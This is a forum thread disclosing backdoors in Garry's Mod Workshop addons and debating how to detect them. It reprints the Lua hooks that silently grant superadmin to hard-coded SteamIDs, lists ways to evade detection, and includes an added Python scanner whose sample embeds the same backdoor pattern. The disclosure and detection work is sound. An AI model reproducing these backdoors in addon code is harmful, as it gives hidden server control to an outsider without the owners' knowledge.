• [PSA] Backdoor Found in "Suits and Robbers Player Models" Workshop Addon
    93 replies, posted
[QUOTE=Acecool;47387351]Surely when you click on "ban" it gives you a link with the id? Why not farm the ids and make a Lua script, or GreaseMonkey script or something else which lets you mass ban or mark x to ban which saves to a file, and when you click on ban selected it reads the txt, bans and saves them in a banned folder?[/QUOTE] Have you ever tried out moderating tools on workshop? I don't think you did.
[QUOTE=Robotboy655;47387636]Have you ever tried out moderating tools on workshop? I don't think you did.[/QUOTE] I haven't but regardless of the methods used ( http GET / POST / JS, etc... ) there should be a way to write a library to read / write to a file using your JS knowledge with GreaseMonkey on Firefox to extend the tools to make managing them much easier.
[QUOTE=Acecool;47388080]I haven't but regardless of the methods used ( http GET / POST / JS, etc... ) there should be a way to write a library to read / write to a file using your JS knowledge with GreaseMonkey on Firefox to extend the tools to make managing them much easier.[/QUOTE] What Robotboy 'should' do and what should already be provided for him are two very different things. Not only that, but given Valve tend to update certain things without even an ounce of notice, it'd turn into a game of cat and mouse.
This addon ([URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293036066"]http://steamcommunity.com/sharedfiles/filedetails/?id=293036066[/URL]) also has a backdoor that makes him and 2 of his friends superadmin. lua/autorun/server/fireman_player.lua
[CODE]function door1( ply )
    if ( ply:SteamID() == "STEAM_0:1:47561717" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory1", door1)

function door2( ply )
    if ( ply:SteamID() == "STEAM_0:0:38951252" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory2", door2)

function door3( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory3", door3)

function door4( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory4", door4)

function door5( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory5", door5)[/CODE]
[QUOTE=MajorAs;47393764]This addon ([URL]http://steamcommunity.com/sharedfiles/filedetails/?id=293036066[/URL]) also has a backdoor that makes him and 2 of his friends superadmin. lua/autorun/server/fireman_player.lua
[CODE]function door1( ply )
    if ( ply:SteamID() == "STEAM_0:1:47561717" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory1", door1)

function door2( ply )
    if ( ply:SteamID() == "STEAM_0:0:38951252" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory2", door2)

function door3( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory3", door3)

function door4( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory4", door4)

function door5( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory5", door5)[/CODE][/QUOTE] Banned. [editline]25th March 2015[/editline] That user has a few bans for the exact same reason btw, might be worth checking all of his addons.
[code]hook.Add("PlayerSpawn", "Backdoory1", door1)[/code] genius, at least it's fun when people try to do something creative to hide it
Just checked his other addons. Here are the ones with the same exact backdoor.
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua)
This guy should be banned from uploading/updating anything on the workshop.
[QUOTE=MajorAs;47394632]Just checked his other addons. Here are the ones with the same exact backdoor.
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua)
This guy should be banned from uploading/updating anything on the workshop.[/QUOTE] The door tags script is a coderhire script as well.
Is there a way to download gma files directly? I would like to write some script that would download all workshop items, extract them, and scan them using regex and stuff.
[QUOTE=edgarasf123;47397647]Is there a way to download gma files directly? I would like to write some script that would download all workshop items, extract them, and scan them using regex and stuff.[/QUOTE] You can download all workshop files through GMod through a script [sp] been there, horrible idea, trust me... [/sp] That will put the gma's into your addon folder, where you can use an external program to check the folder etc. Just be careful, I fucked up one time and accidentally subscribed to the entire GMod workshop and apparently it broke a lot of people's subscriptions. I also learnt that there isn't an unsubscribe all button, but then again, I learnt some web coding from it.
[QUOTE=AnonTakesOver;47397668]You can download all workshop files through GMod through a script [sp] been there, horrible idea, trust me... [/sp] That will put the gma's into your addon folder, where you can use an external program to check the folder etc. Just be careful, I fucked up one time and accidentally subscribed to the entire GMod workshop and apparently it broke a lot of people's subscriptions. I also learnt that there isn't an unsubscribe all button, but then again, I learnt some web coding from it.[/QUOTE] Yeah, that's why I'm asking if I can download them directly. There is [url]http://steamworkshopdownloader.com/[/url] but when I used it in the past it wouldn't download some items.
gma stores Lua in plain text so you wouldn't need to extract. You can use Lua to read the contents though, simply use file.Find( "*", v.title ); when using engine.GetAddons( ); ( still broken on server ) [url]https://bitbucket.org/Acecool/acecooldev_base/src/master/gamemode/shared/classes/class_fileio.lua?at=master#cl-170[/url] = read function from Lua file My fileio also builds lists of files ( which you can then simply open ): [url]https://bitbucket.org/Acecool/acecooldev_base/src/master/gamemode/shared/classes/class_fileio.lua?at=master#cl-276[/url] - this generates the file list - [url]https://bitbucket.org/Acecool/acecooldev_base/src/master/gamemode/shared/classes/class_fileio.lua?at=master#cl-303[/url] - and this one generates the stats list to read how many maps, etc are in the file... These are old but should help show the style: Together, they make lists like this: [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/addon_info_CLIENT.txt[/url] [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/addon_info_SERVER.txt[/url] which is part of the usual structure I use: [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/files_cl.txt[/url] [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/files_sh.txt[/url] [url]https://dl.dropboxusercontent.com/u/26074909/tutoring/_file_structure/files_sv.txt[/url] I've been thinking of making something to detect backdoors too since I am going to write something to automatically create wiki entries for my files ( hence the need for the Read Function command which also reads up for commands ( not all supported yet, but the newest version isn't up yet )... Either way, hopefully this helps. [editline]26th March 2015[/editline] engine.GetAddons( ) only works if you set the workshop as PUBLIC. Why can't private workshop collections be allowed, especially with the API key from the account that can view the workshop addon?? 
I'd like this to be implemented, please!
Ok, used a simple python script to fetch workshop item IDs. 19,000 pages to go. [vid]https://dl.dropboxusercontent.com/u/8081284/ShareX/2015/03/2015-03-26_00-12-20.mp4[/vid]
[QUOTE=MajorAs;47393764]This addon ([URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293036066"]http://steamcommunity.com/sharedfiles/filedetails/?id=293036066[/URL]) also has a backdoor that makes him and 2 of his friends superadmin. lua/autorun/server/fireman_player.lua
[CODE]function door1( ply )
    if ( ply:SteamID() == "STEAM_0:1:47561717" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory1", door1)

function door2( ply )
    if ( ply:SteamID() == "STEAM_0:0:38951252" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory2", door2)

function door3( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory3", door3)

function door4( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory4", door4)

function door5( ply )
    if ( ply:SteamID() == "STEAM_0:1:67615954" ) then
        ply:SetUserGroup("superadmin")
    end
end
hook.Add("PlayerSpawn", "Backdoory5", door5)[/CODE][/QUOTE] [QUOTE=MajorAs;47394632]Just checked his other addons. Here are the ones with the same exact backdoor.
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua)
This guy should be banned from uploading/updating anything on the workshop.[/QUOTE] I looked in them too, they're still in there. He tried hiding them using 12KB of spaces and tabs ( a few hundred lines down or so, then a few hundred tabs to the right )...
hmm, I think we should make a thread where we can report addons/sexdupes/other rule violations so we can clean the workshop of this shit. there should be a rule as well that if you make a sex dupe or whatever you should be permabanned from the gmod workshop :v:
[QUOTE=Acecool;47397922]I looked in them too, they're still in there. He tried hiding them using 12KB of spaces and tabs ( a few hundred lines down or so, then a few hundred tabs to the right )...[/QUOTE] It was already like that, I just made it more readable for the forum instead of posting the whole 500 lines.
Reading this makes me wonder how many things I subscribed to have backdoors. Speaking of, I had a few people complain there are backdoors in my addons, but I'm pretty sure there is none.
[QUOTE=Vipes;47398017]Reading this makes me wonder how many things I subscribed to have backdoors. Speaking of, I had a few people complain there are backdoors in my addons, but I'm [B]pretty sure[/B] there is none.[/QUOTE] :v: [sp] I recommend you thoroughly check. [/sp]
[QUOTE=AnonTakesOver;47398027]:v: [sp] I recommend you thoroughly check. [/sp][/QUOTE] I have. The most complained one, my Halo 3 Pack, the only LUA in it is to make the models show in the playermodel chooser.
I've been wanting to create a form of anti-backdoor for a long time now; this could be achieved through a method which will allow us to prevent Lua from gma files from loading at all... I already have most of the back-end for it written ( build list of files from gma, compare against include or AddCSLuaFile; cache data so it can be processed; process; fix / blacklist / whitelist / etc.. CRC of file to detect any changes, which would require a fresh scan ). This could be part of my dev_base, dev_addon, or admin system / anti-cheat I'm writing or a new category... anti-root? If anyone wants to help, I'd like to build up a collection of backdoors that are in use or have been previously used to help build detection ( This will be a free addon / library / whatever because I can't stand why people would put a backdoor in their code in the first place... It's so shady ), please pm me any examples you have. I do have a few on file ( such as the one above, using string char / byte, and a few more somewhere...
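The kind of external scanner edgarasf123 asked about and Acecool sketches above (file list from the gma, per-file CRC, pattern checks), written here as an added example that is not code from the thread or any poster's project. It reads the gmad container directly, since the Lua inside is plain text, verifies each entry's stored CRC32 against its body, and flags the two tells this thread describes: a hard-coded SteamID beside a superadmin SetUserGroup, and code pushed out of sight behind a long run of whitespace. The container layout is the gmad format as I know it; the sample addon, its paths and the SteamID are constructed placeholders.

```python
import re
import struct
import zlib
from typing import Dict, List, Tuple

def _cstr(buf: bytes, pos: int) -> Tuple[str, int]:
    """NUL-terminated string; returns (text, position just after the NUL)."""
    end = buf.index(b"\0", pos)
    return buf[pos:end].decode("utf-8", "replace"), end + 1

def parse_gma(buf: bytes) -> Dict[str, Tuple[bytes, int]]:
    """Parse a gmad archive (format 1-3) into {path: (body, stored_crc32)}.
    Layout: 'GMAD', u8 version, u64 steamid, u64 timestamp, (v2+) required-content
    strings ended by an empty one, name, description, author, i32 addon version,
    headers (u32 index, name, i64 size, u32 crc) until index 0, then the bodies."""
    if buf[:4] != b"GMAD":
        raise ValueError("not a GMA archive")
    pos, s = 5 + 8 + 8, "x"  # skip version byte, steamid and timestamp
    while buf[4] > 1 and s:  # v2+: required-content list, ended by ""
        s, pos = _cstr(buf, pos)
    for _ in range(3):  # name, description, author
        _, pos = _cstr(buf, pos)
    pos += 4  # addon version
    headers = []
    while struct.unpack_from("<I", buf, pos)[0] != 0:
        name, pos = _cstr(buf, pos + 4)
        size, crc = struct.unpack_from("<qI", buf, pos)
        headers.append((name, size, crc))
        pos += 12
    pos += 4  # terminating zero index; bodies start here, in header order
    files = {}
    for name, size, crc in headers:
        files[name], pos = (buf[pos:pos + size], crc), pos + size
    return files

# Heuristics taken from the thread: a hard-coded SteamID next to a superadmin
# grant, and code pushed out of sight behind a huge run of spaces or tabs.
STEAMID = re.compile(r"STEAM_\d:\d:\d+")
SUPERADMIN = re.compile(r"SetUserGroup\s*\(\s*[\"']superadmin[\"']\s*\)")
HIDDEN_WS = re.compile(r"[ \t]{200,}")

def scan_lua(path: str, src: str) -> List[str]:
    findings = []
    ids = sorted(set(STEAMID.findall(src)))
    if ids and SUPERADMIN.search(src):
        findings.append(f"{path}: superadmin granted to hard-coded {ids}")
    if HIDDEN_WS.search(src):
        findings.append(f"{path}: code hidden behind a long run of whitespace")
    return findings

def scan_gma(buf: bytes) -> List[str]:
    """Findings for every Lua file, plus a CRC32 check of each body (an entry edited after packing no longer matches)."""
    findings = []
    for path, (body, crc) in parse_gma(buf).items():
        if zlib.crc32(body) != crc:
            findings.append(f"{path}: CRC32 mismatch")
        if path.endswith(".lua"):
            findings.extend(scan_lua(path, body.decode("utf-8", "replace")))
    return findings

def build_gma(files: Dict[str, bytes]) -> bytes:
    """Minimal version-3 writer so the scanner can run offline on a constructed addon."""
    z = lambda t: t.encode() + b"\0"
    head = b"GMAD\x03" + struct.pack("<QQ", 0, 0) + z("") + z("demo") + z("") + z("") + struct.pack("<i", 1)
    body = b""
    for i, (name, data) in enumerate(files.items(), 1):
        head += struct.pack("<I", i) + z(name) + struct.pack("<qI", len(data), zlib.crc32(data))
        body += data
    return head + struct.pack("<I", 0) + body

# Constructed sample: a harmless model list with the thread's pattern hidden after 300 spaces (placeholder SteamID).
SAMPLE = build_gma({
    "lua/autorun/server/models.lua": b'player_manager.AddValidModel("demo", "models/demo.mdl")\n'
        + b" " * 300 + b'hook.Add("PlayerSpawn", "d", function(p)\n'
        + b'  if p:SteamID() == "STEAM_0:1:00000000" then p:SetUserGroup("superadmin") end end)\n',
    "models/demo.mdl": b"\x00" * 16})
```

Pointing `scan_gma` at the bytes of each .gma in the addons folder gives a triage list; the regexes are deliberately narrow, so treat a hit as something to read by hand rather than proof.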
[QUOTE=MajorAs;47394632]Just checked his other addons. Here are the ones with the same exact backdoor.
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412330526"]http://steamcommunity.com/sharedfiles/filedetails/?id=412330526[/URL] (lua/autorun/server/phone_call.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293501438"]http://steamcommunity.com/sharedfiles/filedetails/?id=293501438[/URL] (lua/autorun/server/cod_opfor.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=293042805"]http://steamcommunity.com/sharedfiles/filedetails/?id=293042805[/URL] (lua/autorun/server/chef_playermodel_list.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=240006295"]http://steamcommunity.com/sharedfiles/filedetails/?id=240006295[/URL] (lua/autorun/server/cod_mw2_players.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=412295165"]http://steamcommunity.com/sharedfiles/filedetails/?id=412295165[/URL] (lua/autorun/server/p_darkrp_doortags.lua)
[URL="http://steamcommunity.com/sharedfiles/filedetails/?id=305525030"]http://steamcommunity.com/sharedfiles/filedetails/?id=305525030[/URL] (lua/autorun/server/hazmat_player_list.lua)
This guy should be banned from uploading/updating anything on the workshop.[/QUOTE] Thanks, fixed. Unfortunately, it is impossible to "ban" someone from uploading to workshop. I could do this from GMPublish, but he 100% has friends who would do this for him + there are programs that circumvent GMPublish ( like gmosh? )
[QUOTE=Acecool;47398351]I've been wanting to create a form of anti-backdoor for a long time now; this could be achieved through a method which will allow us to prevent Lua from gma files from loading at all... I already have most of the back-end for it written ( build list of files from gma, compare against include or AddCSLuaFile; cache data so it can be processed; process; fix / blacklist / whitelist / etc.. CRC of file to detect any changes, which would require a fresh scan ). This could be part of my dev_base, dev_addon, or admin system / anti-cheat I'm writing or a new category... anti-root? If anyone wants to help, I'd like to build up a collection of backdoors that are in use or have been previously used to help build detection ( This will be a free addon / library / whatever because I can't stand why people would put a backdoor in their code in the first place... It's so shady ), please pm me any examples you have. I do have a few on file ( such as the one above, using string char / byte, and a few more somewhere...[/QUOTE] Have been working on an anti-backdoor as well. Problem is that adminmods and addons like PAC and wiremod get flagged. The best way I can think of would be a list of functions the given addon would 'require', like apps on Google Play.
[QUOTE=Nak;47398431]Have been working on an anti-backdoor as well. Problem is that adminmods and addons like PAC and wiremod get flagged. The best way I can think of would be a list of functions the given addon would 'require', like apps on Google Play.[/QUOTE] You can't really discover all backdoors with some script. Also if some anti-backdoor does get popular, people will just start disguising these backdoors. We should just get rid of Steam Workshop and create a separate "gmod workshop", because authors can run random code on thousands of servers without the owners' knowledge. I'm thinking maybe integrating github so people can track changes made to the addon? It's less likely to happen, but it is still a better idea than having a workshop full of backdoors.
[QUOTE=edgarasf123;47398536]You can't really discover all backdoors with some script. Also if some anti-backdoor does get popular, people will just start disguising these backdoors. We should just get rid of Steam Workshop and create a separate "gmod workshop", because authors can run random code on thousands of servers without the owners' knowledge. I'm thinking maybe integrating github so people can track changes made to the addon? It's less likely to happen, but it is still a better idea than having a workshop full of backdoors.[/QUOTE] Apart from that, you could detour the function (eg http.Fetch()) and bam, the backdoor for the most part has been destroyed. Same sort of thing with SetUserGroup(). Do you really need an addon to be setting those? Detour it and catch the SteamIDs :v: Hell, it doesn't even matter if they're 'disguised', you can use the debug functions to trace back up. The only problem would be load order, but addons (I think?) are loaded after everything else, so as long as there's no other foul play you're fine.
[QUOTE=Teddi Orange;47399006]Apart from that, you could detour the function (eg http.Fetch()) and bam, the backdoor for the most part has been destroyed. Same sort of thing with SetUserGroup(). Do you really need an addon to be setting those? Detour it and catch the SteamIDs :v: Hell, it doesn't even matter if they're 'disguised', you can use the debug functions to trace back up. The only problem would be load order, but addons (I think?) are loaded after everything else, so as long as there's no other foul play you're fine.[/QUOTE] Yes, but how are you going to differentiate with an algorithm legit code from malicious? Or are you implying to check each addon manually? The thing with workshop is that the author can update his addon with a backdoor, do his malicious thing, and 1 hour later remove the backdoor without anyone noticing. There isn't really a need to use http functions because the author can already run code without using http. And what about a secret concommand that can run any lua?
[QUOTE=edgarasf123;47399041]Yes, [B]but how are you going to differentiate with an algorithm legit code from malicious?[/B] Or are you implying to check each addon manually? The thing with workshop is that the author can update his addon with a backdoor, do his malicious thing, and 1 hour later remove the backdoor without anyone noticing. There isn't really a need to use http functions because the author can already run code without using http...[/QUOTE] If you have an understanding of programming then you should know that there are cases that you can use to your own advantage to check for legitimate usage. There are certain functions that you know will be targeted and are typically not used (often) in a live environment. For example, how often is a user realistically going to be added as a 'superadmin' via SetUserGroup? Why not whitelist what concommands users can actually use (or at least, lua based ones). It's not impossible to do, it just requires cleaner code and people to actually not be lazy with their systems. This problem with blindly installing addons has existed for a long time, the main difference is getting the payload on to the system is just 10x easier because of workshop.
I don't know if this would be possible but it would be nice to make a review system where some selected users would be able to check if there is any backdoor in the lua files. Anyways, I don't think the devs can do this without modifications to the workshop from Valve and we can't expect Valve to do these modifications. PS: The addons would only go through this system if they have .lua files.
[QUOTE=Teddi Orange;47399113]If you have an understanding of programming then you should know that there are cases that you can use to your own advantage to check for legitimate usage. There are certain functions that you know will be targeted and are typically not used (often) in a live environment. For example, how often is a user realistically going to be added as a 'superadmin' via SetUserGroup? Why not whitelist what concommands users can actually use (or at least, lua based ones). It's not impossible to do, it just requires cleaner code and people to actually not be lazy with their systems. This problem with blindly installing addons has existed for a long time, the main difference is getting the payload on to the system is just 10x easier because of workshop.[/QUOTE] You don't have to use SetUserGroup, you can modify ULX data files using file.Write, or RunConsoleCommand, or multiple other ways. A command whitelist is easy to bypass by using one of the whitelisted terms and overriding the command with your own, or adding a custom ulx command. And overriding multiple functions, which changes their behavior, is most likely going to break some addons for sure. Unless you're willing to spend years on addon whitelisting, the whitelisting idea is not the best solution. And as I said, the whole workshop is like a huge backdoor, the author doesn't necessarily have to run code to add himself as superadmin because he already has full control of the server through LUA.
[QUOTE=edgarasf123;47399205]You don't have to use SetUserGroup, you can modify ULX data files using file.Write, or RunConsoleCommand, or multiple other ways. A command whitelist is easy to bypass by using one of the whitelisted terms and overriding the command with your own, or adding a custom ulx command. And overriding multiple functions, which changes their behavior, is most likely going to break some addons for sure. Unless you're willing to spend years on addon whitelisting, the whitelisting idea is not the best solution. And as I said, the whole workshop is like a huge backdoor, the author doesn't necessarily have to run code to add himself as superadmin because he already has full control of the server through LUA.[/QUOTE] The idea is to lock the environment down as much as you can; the suggestions I initially listed are somewhat the tip of the iceberg. Workshop is just another (easier) method of delivering the payload. The issue has existed for years otherwise through other methods, such as using the http functions (see: recent coughing epidemic). Anyone with intrinsic glua knowledge should already be detouring RunString (& CompileString) to make things far harder from the get-go. For as long as there's a way to insert yourself into the lua environment, you're going to have these problems, and going "well they still can do x" is a pretty terrible attitude to have. Minimising the risk is all you can do.
-snip-